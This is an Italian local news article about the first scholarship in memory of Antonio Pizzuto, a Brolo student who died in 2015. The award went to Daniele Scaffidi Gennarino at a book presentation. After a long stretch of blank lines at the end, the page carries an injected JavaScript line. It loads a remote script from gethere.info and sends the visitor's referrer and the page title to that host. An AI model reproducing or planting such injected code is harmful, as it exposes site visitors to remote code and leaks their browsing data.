Brolo: La prima borsa di studio “Antonio Pizzuto” assegnata a Daniele Scaffidi Gennarino

1c-borsa-di-studio-pizzuto-2

La prima borsa di studio dedicata allo studente universitario di Brolo ANTONIO PIZZUTO, prematuramente scomparso in un incidente stradale avvenuto a Capo Skino di Gioiosa Marea il 3 agosto 2015, è stata assegnata a DANIELE SCAFFIDI GENNARINO, residente a Piraino nella frazione di Gliaca. L’evento si è svolto nell’ambito della presentazione del libro “Paralipomeni”, a cura di NINO SPEZIALE, nonno di Antonio Pizzuto. Foto e servizio di Massimo Scaffidi. In alto Daniele Scaffidi Gennarino riceve la borsa di studio dalla professoressa MARINELLA SPEZIALE, madre di Antonio Pizzuto…

1-vborsa-di-studio-pizzuto-4

Foto in alto: il tavolo dei relatori

La prima borsa di studio dedicata allo studente universitario di Brolo Antonio Pizzuto, prematuramente scomparso in un incidente stradale avvenuto a Capo Skino di Gioiosa Marea, è stata assegnata a Daniele Scaffidi Gennarino, residente a Piraino nella frazione di Gliaca. La manifestazione si è svolta nel contest della presentazione di “Paralipomeni”, il nuovo libro di Nino Speziale, nonno di Antonio Pizzuto. L’evento, curato da Michelangelo Gaglio, organizzato dall’Istituto Comprensivo di Brolo e dal gruppo culturale “Libriamoci”, si è svolto presso il plesso scolastico di via Libertà. Con l’autore sono intervenuti la dirigente scolastica Maria Ricciardello, l’assessore Marisa Briguglio, in sostituzione del sindaco Irene Ricciardello, impegnata fuori sede, i sindaci di Ficarra e S.Angelo di Brolo, rispettivamente Gaetano Artale e Francesco Paolo Cortolillo. Per il gruppo “Libriamoci” sono intervenute Marinella Speziale (docente e madre di Antonio Pizzuto, che ha dato vita alla borsa di studio insieme al marito, avvocato Francesco Pizzuto), Azzurra Ridolfo e Linda Marino (commerciante).

1-borsa-di-studio-pizzuto-1

Foto in alto: Nino Speciale, l’autore del libro, durante il suo intervento

Nel corso dell’incontro, come detto, si è svolta la consegna della prima edizione della borsa di studio “Antonio Pizzuto”, intitolata al nipote dell’autore, scomparso tragicamente all’età di 20 anni, il 3 agosto 2015, al quale il nonno ha dedicato il libro. ll premio, alla cui selezione hanno partecipato gli studenti iscritti al primo anno di Ingegneria presso il Politecnico di Torino (lo stesso che Antonio Pizzuto, a conclusione del primo anno, frequentava con profitto e talento), provenienti dai Licei Classici e Scientifici di Patti, Capo d’Orlando, S.Agata Militello e Mistretta, è andato a Daniele Scaffidi Gennarino. Lo studente, proveniente dal Liceo Scientifico “Lucio Piccolo” di Capo d’Orlando, è iscritto al primo anno di Ingegneria Biomedica al Politecnico di Torino. Queste le motivazioni del premio: “Sulla base dei punteggi attribuiti nella valutazione della lettera motivazionale e del curriculum dei singoli candidati, la borsa di studio “Antonio Pizzuto” viene assegnata, all’unanimità, a Daniele Scaffidi Gennarino, iscritto al corso di laurea in Ingegneria Biomedica presso il Politecnico di Torino”. La commissione esaminatrice ha sottolineato, oltre all’eccellenza dei risultati scolastici del vincitore della borsa di studio, la sua capacità di rischiare e di mettersi in gioco e il suo amore per la cultura e per la scienza, considerate non solo come strumento di realizzazione personale ma come potenti leve per migliorare le condizioni di vita di chi soffre.  

          Massimo Scaffidi

Edited by, mercoledì 28 dicembre 2016, ore 12,06. 

 

 

 

 

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

(Visited 668 times, 1 visits today)